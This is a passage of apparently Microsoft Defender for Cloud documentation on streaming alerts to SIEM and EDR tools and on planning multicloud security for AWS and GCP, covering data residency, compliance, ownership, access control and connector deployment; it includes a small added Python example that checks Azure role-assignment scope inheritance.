threats are discovered. For example, to notify relevant stakeholders, launch a change 
management process, and apply specific remediation steps when a threat is detected. 


Integrate Defender for Cloud with your SIEM, SOAR, and 
ITSM solutions 


Microsoft Defender for Cloud can stream your security alerts into the most popular 
Security Information and Event Management (SIEM), Security Orchestration Automated 
Response (SOAR), and IT Service Management (ITSM) solutions. 


There are Azure-native tools for ensuring you can view your alert data in all of the most 
popular solutions in use today, including: 


- Microsoft Sentinel
- Splunk Enterprise and Splunk Cloud
- IBM's QRadar
- ServiceNow
- ArcSight
- Power BI
- Palo Alto Networks


Microsoft Sentinel 


Defender for Cloud natively integrates with Microsoft Sentinel, Microsoft's cloud-native
security information and event management (SIEM) and security orchestration automated
response (SOAR) solution.


There are two approaches to ensuring your Defender for Cloud data is represented in 
Microsoft Sentinel: 


- Sentinel connectors - Microsoft Sentinel includes built-in connectors for Microsoft
  Defender for Cloud at the subscription and tenant levels:
  - Stream alerts to Microsoft Sentinel at the subscription level
  - Connect all subscriptions in your tenant to Microsoft Sentinel

  Tip

  Learn more in Connect security alerts from Microsoft Defender for Cloud.

- Stream your audit logs - An alternative way to investigate Defender for Cloud
  alerts in Microsoft Sentinel is to stream your audit logs into Microsoft Sentinel:
  - Connect Windows security events
  - Collect data from Linux-based sources using Syslog
  - Connect data from Azure Activity log


Stream alerts with Microsoft Graph Security API 


Defender for Cloud has out-of-the-box integration with Microsoft Graph Security API. 
No configuration is required and there are no extra costs. 


You can use this API to stream alerts from the entire tenant (and data from many other 
Microsoft Security products) into third-party SIEMs and other popular platforms: 


- Splunk Enterprise and Splunk Cloud - Use the Microsoft Graph Security API Add-On
  for Splunk
- Power BI - Connect to the Microsoft Graph Security API in Power BI Desktop
- ServiceNow - Follow the instructions to install and configure the Microsoft Graph
  Security API application from the ServiceNow Store
- QRadar - IBM's Device Support Module for Microsoft Defender for Cloud via
  Microsoft Graph API
- Palo Alto Networks, Anomali, Lookout, InSpark, and more - Microsoft Graph
  Security API

Learn more about Microsoft Graph Security API.


Stream alerts with Azure Monitor 


Use Defender for Cloud's continuous export feature to connect Defender for Cloud with
Azure Monitor via Azure Event Hubs and stream alerts into ArcSight, SumoLogic, Syslog
servers, LogRhythm, Logz.io Cloud Observability Platform, and other monitoring
solutions.


Learn more in Stream alerts with Azure Monitor. 


This can also be done at the Management Group level using Azure Policy, see Create 
continuous export automation configurations at scale. 


Tip

To view the event schemas of the exported data types, visit the Event Hub event
schemas.


Integrate Defender for Cloud with an Endpoint Detection 
and Response (EDR) solution 


Microsoft Defender for Endpoint

Microsoft Defender for Endpoint is a holistic, cloud-delivered endpoint security solution.


Defender for Cloud's integrated CWPP for machines, Microsoft Defender for Servers,
includes an integrated license for Microsoft Defender for Endpoint. Together, they
provide comprehensive endpoint detection and response (EDR) capabilities. For more
information, see Protect your endpoints.


When Defender for Endpoint detects a threat, it triggers an alert. The alert is shown in 
Defender for Cloud. From Defender for Cloud, you can also pivot to the Defender for 
Endpoint console and perform a detailed investigation to uncover the scope of the 
attack. Learn more about Microsoft Defender for Endpoint. 


Other EDR solutions 


Defender for Cloud provides hardening recommendations to ensure you're securing 
your organization's resources according to the guidance of Azure Security Benchmark. 
One of the controls in the benchmark relates to endpoint security: ES-1: Use Endpoint 
Detection and Response (EDR). 


There are two recommendations in Defender for Cloud to ensure you've enabled 
endpoint protection and it's running well. These recommendations are checking for the 
presence and operational health of EDR solutions from: 


- Trend Micro
- Symantec
- McAfee
- Sophos


Learn more in Endpoint protection assessment and recommendations in Microsoft 
Defender for Cloud. 


Apply your Zero Trust strategy to hybrid and multicloud 
scenarios 


With cloud workloads commonly spanning multiple cloud platforms, cloud security 
services must do the same. 


Microsoft Defender for Cloud protects workloads wherever they're running: in Azure, 
on-premises, Amazon Web Services (AWS), or Google Cloud Platform (GCP). 


Integrate Defender for Cloud with on-premises machines 


To secure hybrid cloud workloads, you can extend Defender for Cloud's protections by
connecting on-premises machines to Azure Arc enabled servers.


Learn about how to connect machines in Connect your non-Azure machines to 
Defender for Cloud. 


Integrate Defender for Cloud with other cloud environments 


To view the security posture of Amazon Web Services machines in Defender for Cloud, 
onboard AWS accounts into Defender for Cloud. This integrates AWS Security Hub and 
Microsoft Defender for Cloud for a unified view of Defender for Cloud recommendations 
and AWS Security Hub findings and provides a range of benefits as described in 
Connect your AWS accounts to Microsoft Defender for Cloud. 


To view the security posture of Google Cloud Platform machines in Defender for Cloud, 
onboard GCP accounts into Defender for Cloud. This integrates GCP Security Command 
and Microsoft Defender for Cloud for a unified view of Defender for Cloud 
recommendations and GCP Security Command Center findings and provides a range of 
benefits as described in Connect your GCP accounts to Microsoft Defender for Cloud. 


Next steps 


To learn more about Microsoft Defender for Cloud, see the complete Defender for
Cloud documentation.


Get started 


Article · 05/10/2023


This article introduces guidance to help you design a solution for securing and 
protecting your multicloud environment with Microsoft Defender for Cloud. The 
guidance can be used by cloud solution and infrastructure architects, security architects 
and analysts, and anyone else involved in designing a multicloud security solution. 


As you capture your functional and technical requirements, the articles provide an 
overview of multicloud capabilities, planning guidance, and prerequisites. 


Follow the guides in order. They build on each other to help you make design decisions. 
We recommend that you reread the articles as needed, to understand and incorporate 
all considerations. 


What should I get from this guide? 


Use this guide as an aid as you design Cloud Security Posture Management (CSPM) and 
Cloud Workload Protection Plan (CWPP) solutions across multicloud environments. After 
reading the articles you should have answers to the following: 


- What questions should I ask and answer as I design my multicloud solution?
- What steps do I need to complete to design a solution?
- What technologies and capabilities are available to me?
- What trade-offs do I need to consider?


Problem space 


As organizations span multiple cloud providers, it becomes increasingly complex to 
centralize security, and for security teams to work across multiple environments and 
vendors. 


Defender for Cloud helps you to protect your multicloud environment by strengthening 
your security posture and protecting your workloads. Defender for Cloud provides a 
single dashboard to manage protection across all environments. 
Before you begin


Before working through these articles, you should have a basic understanding of Azure, 
Defender for Cloud, Azure Arc, and your multicloud AWS/GCP environment. 


Next steps 


In this article, you have been provided an introduction to begin your path to designing a 
multicloud security solution. Continue with the next step to determine business needs. 


Determine business needs 


Article · 05/10/2023


This article is part of a series to provide guidance as you design a cloud security posture
management (CSPM) and cloud workload protection platform (CWPP) solution across
multicloud resources with Microsoft Defender for Cloud.


Goal 


Identify how Defender for Cloud’s multicloud capabilities can help your organization to 
meet its business goals and protect AWS/GCP resources. 


Get started 


The first step in designing a multicloud security solution is to determine your business 
needs. Every company, even if in the same industry, has different requirements. Best 
practices can provide general guidance, but specific requirements are determined by 
your unique business needs. As you start defining requirements, answer these questions: 


- Does your company need to assess and strengthen the security configuration of its
  cloud resources?
- Does your company want to manage the security posture of multicloud resources
  from a single point (single pane of glass)?
- What boundaries do you want to put in place to ensure that your entire
  organization is covered, and no areas are missed?
- Does your company need to comply with industry and regulatory standards? If so,
  which standards?
- What are your goals for protecting critical workloads, including containers and
  servers, against malicious attacks?
- Do you need a solution only in a specific cloud environment, or a cross-cloud
  solution?
- How will the company respond to alerts and recommendations, and remediate
  non-compliant resources?
- Will workload owners be expected to remediate issues?


Mapping Defender for Cloud to business 
requirements 


Defender for Cloud provides a single management point for protecting Azure, on-premises,
and multicloud resources. Defender for Cloud can meet your business requirements by:

- Securing and protecting your GCP, AWS, and Azure environments.
- Assessing and strengthening the security configuration of your cloud workloads.
- Managing compliance against critical industry and regulatory standards.
- Providing vulnerability management solutions for servers and containers.
- Protecting critical workloads, including containers, servers, and databases, against
  malicious attacks.


The diagram below shows the Defender for Cloud architecture. Defender for Cloud can: 


- Provide unified visibility and recommendations across multicloud environments.
  There's no need to switch between different portals to see the status of your
  resources.
- Compare your resource configuration against industry standards, regulations, and
  benchmarks. Learn more about standards.
- Help security analysts to triage alerts based on threats/suspicious activities.
- Workload protection capabilities can be applied to critical workloads for threat
  detection and advanced defenses.
Next steps


In this article, you've learned how to determine your business needs when designing a
multicloud security solution. Continue with the next step to determine an adoption
strategy.


Define an adoption strategy 


Article · 03/30/2023


This article is part of a series to provide guidance as you design a cloud security posture
management (CSPM) and cloud workload protection platform (CWPP) solution across
multicloud resources with Microsoft Defender for Cloud.


Goal 


Consider your high-level business needs, the resource and process ownership model for 
your organization, and an iteration strategy as you continuously add resources to your 
solution. 


Get started 


Think about your broad requirements: 


- Determine business needs. Keep first steps simple, and then iterate to
  accommodate future change. Decide your goals for a successful adoption, and
  then the metrics you'll use to define success.

- Determine ownership. Figure out where multicloud capabilities fall under your
  teams. Review the determine ownership requirements and determine access
  control requirements articles to answer these questions:
  - How will your organization use Defender for Cloud as a multicloud solution?
  - What cloud security posture management (CSPM) and cloud workload
    protection (CWP) capabilities do you want to adopt?
  - Which teams will own the different parts of Defender for Cloud?
  - What is your process for responding to security alerts and recommendations?
    Remember to consider Defender for Cloud's governance feature when making
    decisions about recommendation processes.
  - How will security teams collaborate to prevent friction during remediation?

- Plan a lifecycle strategy. As new multicloud resources onboard into Defender for
  Cloud, you need a strategic plan in place for that onboarding. Remember that you
  can use auto-provisioning for easier agent deployment.


Next steps 


In this article, you've learned how to determine your adoption strategy when designing 
a multicloud security solution. Continue with the next step to determine data residency 
requirements. 


Determine data residency requirements 


Article · 08/13/2023


This article is one of a series providing guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Identify data residency constraints as you plan your multicloud deployment. 


Get started 


When designing business solutions, data residency (the physical or geographic location 
of an organization's data) is often top of mind due to compliance requirements. For 
example, the European Union's General Data Protection Regulation (GDPR) requires all 
data collected on citizens to be stored in the EU, for it to be subject to European privacy 
laws. 


As you plan, consider these points around data residency:

- When you create connectors to protect multicloud resources, the connector
  resource is hosted in an Azure resource group that you choose when you set up
  the connector. Select this resource group in accordance with your data residency
  requirements.
- When data is retrieved from AWS/GCP, it's stored in either GDPR-EU, or US:
  - Defender for Cloud looks at the region in which the data is stored in the
    AWS/GCP cloud and matches that.
  - Anything in the EU is stored in the EU region. Anything else is stored in the US
    region.


Agent considerations 


There are data considerations around agents and extensions used by Defender for 
Cloud. 


- CSPM: CSPM functionality in Defender for Cloud is agentless. No agents are
  needed for CSPM to work.
- CWP: Some workload protection functionality for Defender for Cloud requires the
  use of agents to collect data.


Defender for Servers plan 


Agents are used in the Defender for Servers plan as follows: 


- Non-Azure public clouds connect to Azure by leveraging the Azure Arc service.
- The Azure Connected Machine agent is installed on multicloud machines that
  onboard as Azure Arc machines. Defender for Cloud should be enabled in the
  subscription in which the Azure Arc machines are located.
- Defender for Cloud leverages the Connected Machine agent to install extensions
  (such as Microsoft Defender for Endpoint) that are needed for Defender for Servers
  functionality.
- Log Analytics agent/Azure Monitor Agent (AMA) is needed for some Defender for
  Servers Plan 2 functionality.
  - The agents can be provisioned automatically by Defender for Cloud.
  - When you enable auto-provisioning, you specify where to store collected data:
    either in the default Log Analytics workspace created by Defender for Cloud, or
    in any other workspace in your subscription. Learn more.
  - If you select to continuously export data, you can drill into and configure the
    types of events and alerts that are saved. Learn more.
- Log Analytics workspace:
  - You define the Log Analytics workspace you use at the subscription level. It can
    be either a default workspace, or a custom-created workspace.
  - There are several reasons to select the default workspace rather than the
    custom workspace.
  - The location of the default workspace depends on your Azure Arc machine
    region. Learn more.
  - The location of the custom-created workspace is set by your organization. Learn
    more about using a custom workspace.


Defender for Containers plan 


Defender for Containers protects your multicloud container deployments running in: 


- Azure Kubernetes Service (AKS) - Microsoft's managed service for developing,
  deploying, and managing containerized applications.
- Amazon Elastic Kubernetes Service (EKS) in a connected AWS account -
  Amazon's managed service for running Kubernetes on AWS without needing to
  install, operate, and maintain your own Kubernetes control plane or nodes.
- Google Kubernetes Engine (GKE) in a connected GCP project - Google's managed
  environment for deploying, managing, and scaling applications using GCP
  infrastructure.
- Other Kubernetes distributions - using Azure Arc-enabled Kubernetes, which
  allows you to attach and configure Kubernetes clusters running anywhere,
  including other public clouds and on-premises.


Defender for Containers has both agent-based and agentless components. 


- Agentless collection of Kubernetes audit log data: Amazon CloudWatch or GCP
  Cloud Logging enables and collects audit log data, and sends the collected
  information to Defender for Cloud for further analysis. Data storage is based on
  the EKS cluster AWS region, in accordance with GDPR - EU and US.
- Agent-based Azure Arc-enabled Kubernetes: Connects your EKS and GKE clusters
  to Azure using Azure Arc agents, so that they're treated as Azure Arc resources.
- Defender agent: A DaemonSet that collects signals from hosts using eBPF
  technology, and provides runtime protection. The extension is registered with a
  Log Analytics workspace and used as a data pipeline. The audit log data isn't
  stored in the Log Analytics workspace.
- Azure Policy for Kubernetes: configuration information is collected by Azure Policy
  for Kubernetes.
  - Azure Policy for Kubernetes extends the open-source Gatekeeper v3 admission
    controller webhook for Open Policy Agent.
  - The extension registers as a web hook to Kubernetes admission control and
    makes it possible to apply at-scale enforcement, safeguarding your clusters in a
    centralized, consistent manner.


Defender for Databases plan 


For the Defender for Databases plan in a multicloud scenario, you leverage Azure Arc to 
manage the multicloud SQL Server databases. The SQL Server instance is installed in a 
virtual or physical machine connected to Azure Arc. 


- The Azure Connected Machine agent is installed on machines connected to Azure
  Arc.
- The Defender for Databases plan should be enabled in the subscription in which
  the Azure Arc machines are located.
- The Log Analytics agent for Microsoft Defender SQL Servers should be provisioned
  on the Azure Arc machines. It collects security-related configuration settings and
  event logs from machines.
- Automatic SQL server discovery and registration needs to be set to On to allow
  SQL database discovery on the machines.


When it comes to the actual AWS and GCP resources that are protected by Defender for 
Cloud, their location is set directly from the AWS and GCP clouds. 


Next steps 


In this article, you have learned how to determine your data residency requirements
when designing a multicloud security solution. Continue with the next step to determine
compliance requirements.


Determine compliance requirements 


Article · 05/10/2023


This article is part of a series to provide guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Identify compliance requirements in your organization as you design your multicloud
solution.


Get started 


Defender for Cloud continually assesses the configuration of your resources against 
compliance controls and best practices in the standards and benchmarks you've applied 
in your subscriptions. 


- By default every subscription has the Azure Security Benchmark assigned. This
  benchmark contains Microsoft Azure security and compliance best practices, based
  on common compliance frameworks.
- AWS standards include AWS Foundational Best Practices, CIS 1.2.0, and PCI DSS
  3.2.1.
- GCP standards include GCP Default, GCP CIS 1.1.0/1.2.0, GCP ISO 27001, GCP NIST
  800 53, and PCI DSS 3.2.1.
- By default, every subscription that contains the AWS connector has the AWS
  Foundational Security Best Practices assigned.
- Every subscription with the GCP connector has the GCP Default benchmark
  assigned.
- For AWS and GCP, the compliance monitoring freshness interval is 4 hours.


After you enable enhanced security features, you can add other compliance standards to 
the dashboard. Regulatory compliance is available when you enable at least one 
Defender plan on the subscription in which the multicloud connector is located, or on 
the connector. 


Additionally, you can create your own custom standards and assessments for
AWS and GCP to align to your organizational requirements.


Next steps 


In this article, you've learned how to determine your compliance requirements when 
designing a multicloud security solution. Continue with the next step to determine 
ownership requirements. 


Determine ownership requirements 


Article · 05/10/2023


This article is one of a series providing guidance as you design a cloud security posture
management (CSPM) and cloud workload protection (CWP) solution across multicloud
resources with Microsoft Defender for Cloud.


Goal 


Identify the teams involved in your multicloud security solution, and plan how they will 
align and work together. 


Security functions 


Depending on the size of your organization, separate teams will manage security 
functions. In a complex enterprise, functions might be numerous. 


| Security function | Details |
|---|---|
| Security Operations (SecOps) | Reducing organizational risk by reducing the time in which bad actors have access to corporate resources. Reactive detection, analysis, response and remediation of attacks. Proactive threat hunting. |
| Security architecture | Security design summarizing and documenting the components, tools, processes, teams, and technologies that protect your business from risk. |
| Security compliance management | Processes that ensure the organization is compliant with regulatory requirements and internal policies. |
| People security | Protecting the organization from human risk to security. |
| Application security and DevSecOps | Integrating security into DevOps processes and apps. |
| Data security | Protecting your organizational data. |
| Infrastructure and endpoint security | Providing protection, detection and response for infrastructure, networks, and endpoint devices used by apps and users. |
| Identity and key management | Authenticating and authorizing users, services, devices, and apps. Provide secure distribution and access for cryptographic operations. |
| Threat intelligence | Making decisions and acting on security threat intelligence that provides context and actionable insights on active attacks and potential threats. |
| Posture management | Continuously reporting on, and improving, your organizational security posture. |
| Incident preparation | Building tools, processes, and expertise to respond to security incidents. |


Team alignment 


Despite the many different teams who manage cloud security, it's critical that they work 
together to figure out who's responsible for decision making in the multicloud 
environment. Lack of ownership creates friction that can result in stalled projects and 
insecure deployments that couldn't wait for security approval. 


Security leadership, most commonly under the CISO, should specify who's accountable 
for security decision making. Typically, responsibilities align as summarized in the table. 


| Category | Description | Typical Team |
|---|---|---|
| Server endpoint security | Monitor and remediate server security, includes patching, configuration, endpoint security, etc. | Joint responsibility of central IT operations and Infrastructure and endpoint security teams. |
| Incident monitoring and response | Investigate and remediate security incidents in your organization's SIEM or source console. | Security operations team. |
| Policy management | Set direction for Azure role-based access control (Azure RBAC), Microsoft Defender for Cloud, administrator protection strategy, and Azure Policy, in order to govern Azure resources, custom AWS/GCP recommendations etc. | Joint responsibility of policy and standards and security architecture teams. |
| Threat and vulnerability management | Maintain complete visibility and control of the infrastructure, to ensure that critical issues are discovered and remediated as efficiently as possible. | Joint responsibility of central IT operations and Infrastructure and endpoint security teams. |
| Application workloads | Focus on security controls for specific workloads. The goal is to integrate security assurances into development processes and custom line of business (LOB) applications. | Joint responsibility of application development and central IT operations teams. |
| Identity security and standards | Understand Permission Creep Index (PCI) for Azure subscriptions, AWS accounts, and GCP projects, in order to identify risks associated with unused or excessive permissions across identities and resources. | Joint responsibility of identity and key management, policy and standards, and security architecture teams. |


Best practices 


- Although multicloud security might be divided across different areas of the
  business, teams should manage security across the multicloud estate. This is better
  than having different teams secure different cloud environments, for example
  where one team manages Azure and another team manages AWS. Teams working
  across multicloud environments helps to prevent sprawl within the organization. It
  also helps to ensure that security policies and compliance requirements are
  applied in every environment.

- Often, teams that manage Defender for Cloud don't have privileges to remediate
  recommendations in workloads. For example, the Defender for Cloud team might
  not be able to remediate vulnerabilities in an AWS EC2 instance. The security team
  might be responsible for improving the security posture, but unable to fix the
  resulting security recommendations. To address this issue:
  - It's imperative to involve the AWS workload owners.
  - Assigning owners with due dates and defining governance rules creates
    accountability and transparency, as you drive processes to improve security
    posture.

- Depending on organizational models, we commonly see these options for central
  security teams operating with workload owners:
  - Option 1: Centralized model. Security controls are defined, deployed, and
    monitored by a central team.
    - The central security team decides which security policies will be implemented
      in the organization and who has permissions to control the set policy.
    - The team might also have the power to remediate non-compliant resources
      and enforce resource isolation in case of a security threat or configuration
      issue.
    - Workload owners on the other hand are responsible for managing their
      cloud workloads but need to follow the security policies that the central team
      has deployed.
    - This model is most suitable for companies with a high level of automation, to
      ensure automated response processes to vulnerabilities and threats.
  - Option 2: Decentralized model. Security controls are defined, deployed, and
    monitored by workload owners.
    - Security control deployment is done by workload owners, as they own the
      policy set and can therefore decide which security policies are applicable to
      their resources.
    - Owners need to be aware of, understand, and act upon security alerts and
      recommendations for their own resources.
    - The central security team on the other hand only acts as a controlling entity,
      without write-access to any of the workloads.
    - The security team usually has insights into the overall security posture of the
      organization, and they might hold the workload owners accountable for
      improving their security posture.
    - This model is most suitable for organizations that need visibility into their
      overall security posture, but at the same time want to keep responsibility for
      security with the workload owners.
    - Currently, the only way to achieve Option 2 in Defender for Cloud is to assign
      the workload owners with Security Reader permissions to the subscription
      that's hosting the multicloud connector resource.


Next steps 


In this article, you have learned how to determine ownership requirements when 


designing a multicloud security solution. Continue with the next step to determine 


access control requirements. 


Determine access control requirements 


Article · 05/10/2023


This article is part of a series to provide guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Figure out what permissions and access controls you need on your multicloud 
deployment. 


Get started 


As part of your multicloud solution design you should review access requirements for 
multicloud resources that will be available to users. As you plan, answer the following 
questions, take notes, and be clear about the reasons for the answer. 


- Who should have access to recommendations and alerts for multicloud resources?
- Are your multicloud resources and environments owned by different teams? If so,
  does each team need the same level of access?
- Do you need to limit access to specific resources for specific users and groups? If
  so, how can you limit access for Azure, AWS, and GCP resources?
- Does your organization need identity and access management (IAM permissions)
  to be inherited to the resource group level?
- Do you need to determine any IAM requirements for people who:
  - Implement JIT attack surface reduction for VMs and AWS EC2?
  - Define Adaptive Application Controls (access defined by application owner)?
  - Perform security operations?


With clear answers available, you can figure out your Defender for Cloud access 
requirements. Other things to consider: 


- Defender for Cloud multicloud capabilities support inheritance of IAM permissions.
- Whatever permissions the user has for the resource group level where the
  AWS/GCP connectors reside, are inherited automatically for multicloud
  recommendations and security alerts.
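Because access to multicloud recommendations and alerts follows the Azure role assignments that cover the connector's resource group, it helps to be able to answer "who effectively holds which role at this scope?" from a list of assignments, including roles assigned higher up (the subscription) and inherited down. The block below is an added example, not Defender for Cloud's own code or a Microsoft sample: the principals, roles and scopes are constructed placeholders, and the scope layout (/subscriptions/<id>/resourceGroups/<name>) is the standard Azure resource ID form. The check compares scopes segment by segment, because a plain string-prefix test wrongly treats an assignment on rg-connectors as covering rg-connectors-eu.

```python
"""Azure RBAC scope inheritance check (added example, constructed data)."""
from typing import Dict, List, Set

# Constructed role assignments; subscription IDs and group names are placeholders.
SAMPLE_ASSIGNMENTS: List[Dict[str, str]] = [
    {"principal": "alice", "role": "Security Reader",
     "scope": "/subscriptions/SUB-PLACEHOLDER"},
    {"principal": "bob", "role": "Security Admin",
     "scope": "/subscriptions/SUB-PLACEHOLDER/resourceGroups/rg-connectors"},
    {"principal": "carol", "role": "Security Reader",
     "scope": "/subscriptions/SUB-PLACEHOLDER/resourceGroups/rg-connectors-eu"},
    {"principal": "dave", "role": "Security Reader",
     "scope": "/subscriptions/OTHER-SUB-PLACEHOLDER"},
]

# Resource groups (placeholders) that host AWS/GCP connector resources.
CONNECTOR_RG = "/subscriptions/SUB-PLACEHOLDER/resourceGroups/rg-connectors"
CONNECTOR_RG_EU = "/subscriptions/SUB-PLACEHOLDER/resourceGroups/rg-connectors-eu"


def _segments(scope: str) -> List[str]:
    """Split a scope into path segments; Azure scopes compare case-insensitively."""
    return [s.lower() for s in scope.strip("/").split("/") if s]


def scope_covers(assignment_scope: str, target_scope: str) -> bool:
    """True if a role assigned at assignment_scope is inherited at target_scope.

    Inheritance flows down the hierarchy, so the assignment scope must be an
    ancestor of (or equal to) the target, segment by segment. Comparing whole
    segments, not string prefixes, keeps rg-connectors from matching rg-connectors-eu.
    """
    a, t = _segments(assignment_scope), _segments(target_scope)
    return len(a) <= len(t) and t[: len(a)] == a


def effective_roles(assignments: List[Dict[str, str]], target_scope: str) -> Dict[str, Set[str]]:
    """Map each principal to the roles it effectively holds at target_scope."""
    roles: Dict[str, Set[str]] = {}
    for asg in assignments:
        if scope_covers(asg["scope"], target_scope):
            roles.setdefault(asg["principal"], set()).add(asg["role"])
    return roles


if __name__ == "__main__":
    for scope in (CONNECTOR_RG, CONNECTOR_RG_EU):
        print(scope)
        for principal, held in sorted(effective_roles(SAMPLE_ASSIGNMENTS, scope).items()):
            print("  ", principal, sorted(held))
```

Running it shows alice (assigned at the subscription) on both connector groups, bob only on rg-connectors, carol only on rg-connectors-eu, and dave (a different subscription) on neither; that is exactly the set of users who will see the connectors' recommendations and alerts through inheritance.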


Next steps 


In this article, you've learned how to determine access control requirements when
designing a multicloud security solution. Continue with the next step to determine
multicloud dependencies.


Determine multicloud dependencies 


Article · 08/30/2023


This article is one of a series providing guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Figure out dependencies that might influence your multicloud design. 


Get started 


As you design your multicloud solution, it’s important to have a clear picture of the 
components needed to enjoy all multicloud features in Defender for Cloud. 


CSPM 


Defender for Cloud provides Cloud Security Posture Management (CSPM) features for 
your AWS and GCP workloads. 


- After you onboard AWS and GCP, Defender for Cloud starts assessing your
  multicloud workloads against industry standards, and reports on your security
  posture.
- CSPM features are agentless and don't rely on any other components except for
  successful onboarding of AWS/GCP connectors.
- It's important to note that the Security Posture Management plan is turned on by
  default and can't be turned off.
- Learn about the IAM permissions needed to discover AWS resources for CSPM.


CWPP 


Note

As the Log Analytics agent is set to retire in August 2024 and as part of the
Defender for Cloud updated strategy, all Defender for Servers features and
capabilities will be provided either through Microsoft Defender for Endpoint
integration or agentless scanning, without dependency on either the Log Analytics
agent (MMA) or Azure Monitor agent (AMA). For more information about this
change, see this announcement.


In Defender for Cloud, you enable specific plans to get Cloud Workload Protection
Platform (CWPP) features. Plans to protect multicloud resources include:


• Defender for Servers: Protect AWS/GCP Windows and Linux machines.

• Defender for Containers: Help secure your Kubernetes clusters with security
recommendations and hardening, vulnerability assessments, and runtime
protection.

• Defender for SQL: Protect SQL databases running in AWS and GCP.


What extension do I need? 


The following table summarizes extension requirements for CWPP. 


Extension                                                | Defender for Servers | Defender for Containers | Defender for SQL on Machines
Azure Arc Agent                                          | ✔                    | ✔                       | ✔
Microsoft Defender for Endpoint extension                | ✔                    |                         |
Vulnerability assessment                                 | ✔                    |                         |
Agentless Disk Scanning                                  | ✔                    | ✔                       |
Log Analytics or Azure Monitor Agent (preview) extension | ✔                    |                         | ✔
Defender agent                                           |                      | ✔                       |
Azure Policy for Kubernetes                              |                      | ✔                       |
Kubernetes audit log data                                |                      | ✔                       |
SQL servers on machines                                  |                      |                         | ✔
Automatic SQL server discovery and registration          |                      |                         | ✔


Defender for Servers 


Enabling Defender for Servers on your AWS or GCP connector allows Defender for Cloud
to provide server protection to your Google Compute Engine VMs and AWS EC2
instances.


Review plans 


Defender for Servers offers two different plans: 


• Plan 1:

  o MDE integration: Plan 1 integrates with Microsoft Defender for Endpoint Plan 2
  to provide a full endpoint detection and response (EDR) solution for machines
  running a range of operating systems. Defender for Endpoint features include:

    - Reducing the attack surface for machines.
    - Providing antivirus capabilities.
    - Threat management, including threat hunting, detection, analytics, and
    automated investigation and response.

  o Provisioning: Automatic provisioning of the Defender for Endpoint sensor on
  every supported machine that's connected to Defender for Cloud.

  o Licensing: Charges Defender for Endpoint licenses per hour instead of per seat,
  lowering costs by protecting virtual machines only when they are in use.

• Plan 2: Includes all the components of Plan 1 along with additional capabilities
such as File Integrity Monitoring (FIM), Just-in-time (JIT) VM access, and more.


Review the features of each plan before onboarding to Defender for Servers. 


Review components 


The following components and requirements are needed to receive full protection from
the Defender for Servers plan:


• Azure Arc agent: AWS and GCP machines connect to Azure using Azure Arc. The
Azure Arc agent connects them.

  o The Azure Arc agent is needed to read security information on the host level
  and allow Defender for Cloud to deploy the agents/extensions required for
  complete protection. To autoprovision the Azure Arc agent, the OS
  configuration agent on GCP VM instances and the AWS Systems Manager (SSM)
  agent for AWS EC2 instances must be configured. Learn more about the agent.

• Defender for Endpoint capabilities: The Microsoft Defender for Endpoint agent
provides comprehensive endpoint detection and response (EDR) capabilities.

• Vulnerability assessment: Using either the integrated Qualys vulnerability scanner,
or the Microsoft Defender Vulnerability Management solution.

• Log Analytics agent/Azure Monitor Agent (AMA) (in preview): Collects security-related
configuration information and event logs from machines.


Check networking requirements 


Machines must meet network requirements before onboarding the agents. 
Autoprovisioning is enabled by default. 


Defender for Containers 


Enabling Defender for Containers provides GKE and EKS clusters and underlying hosts 
with threat detection capabilities that include: 


• Kubernetes behavioral analytics
• Anomaly detection
• Security best practices
• Built-in admission control policies and more


Review components-Defender for Containers


The required components are as follows:


• Azure Arc Agent: Connects your GKE and EKS clusters to Azure, and onboards the
Defender agent.

• Defender agent: Provides host-level runtime threat protection.

• Azure Policy for Kubernetes: Extends the Gatekeeper v3 to monitor every request
to the Kubernetes API server, and ensures that security best practices are being
followed on clusters and workloads.

• Kubernetes audit logs: Audit logs from the API server allow Defender for
Containers to identify suspicious activity within your multicloud servers, and
provide deeper insights while investigating alerts. Sending of the "Kubernetes
audit logs" needs to be enabled on the connector level.


Check networking requirements-Defender for Containers 


Make sure to check that your clusters meet network requirements so that the Defender 
agent can connect with Defender for Cloud. 


Defender for SQL 


Defender for SQL provides threat detection for the GCP Compute Engine and AWS. The 
Defender for SQL Server on Machines plan must be enabled on the subscription where 
the connector is located. 


Review components-Defender for SQL 


To receive the full benefits of Defender for SQL on your multicloud workload, you need 
these components: 


• Azure Arc agent: AWS and GCP machines connect to Azure using Azure Arc. The
Azure Arc agent connects them.

  o The Azure Arc agent is needed to read security information on the host level
  and allow Defender for Cloud to deploy the agents/extensions required for
  complete protection.

  o To autoprovision the Azure Arc agent, the OS configuration agent on GCP VM
  instances and the AWS Systems Manager (SSM) agent for AWS EC2 instances
  must be configured. Learn more about the agent.

• Log Analytics agent/Azure Monitor Agent (AMA) (in preview): Collects security-related
configuration information and event logs from machines.

• Automatic SQL server discovery and registration: Supports automatic discovery
and registration of SQL servers.


Next steps 


In this article, you have learned how to determine multicloud dependencies when 
designing a multicloud security solution. Continue with the next step to automate 
connector deployment. 


Automate connector deployment 
This article is part of a series to guide you in designing a solution for cloud security
posture management (CSPM) and cloud workload protection (CWP) across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Connect AWS accounts and/or GCP projects programmatically. 


Get started 


As an alternative to creating connectors in the Defender for Cloud portal, you can create 
them programmatically by using the Defender for Cloud REST API. Review the Security 
Connectors - REST API. 


Security Connectors


Reference


Service: Security Center


API Version: 2021-12-01-preview


Operations

Create Or Update       | Creates or updates a security connector. If a security connector is already
                       | created and a subsequent request is issued for the same security
                       | connector id, then ...
Delete                 | Deletes a security connector.
Get                    | Retrieves details of a specific security connector.
List                   | Lists all the security connectors in the specified subscription. Use the
                       | 'nextLink' property in the response to get the next page of security
                       | connectors for the...
List By Resource Group | Lists all the security connectors in the specified resource group. Use the
                       | 'nextLink' property in the response to get the next page of security
                       | connectors for t...
Update                 | Updates a security connector.


• When you use the REST API to create the connector, you also need the
CloudFormation template, or Cloud Shell script, depending on the environment
that you're onboarding to Defender for Cloud.

• The easiest way to get this script is to download it from the Defender for Cloud
portal.

• The template/script changes depending on the plans you're enabling.
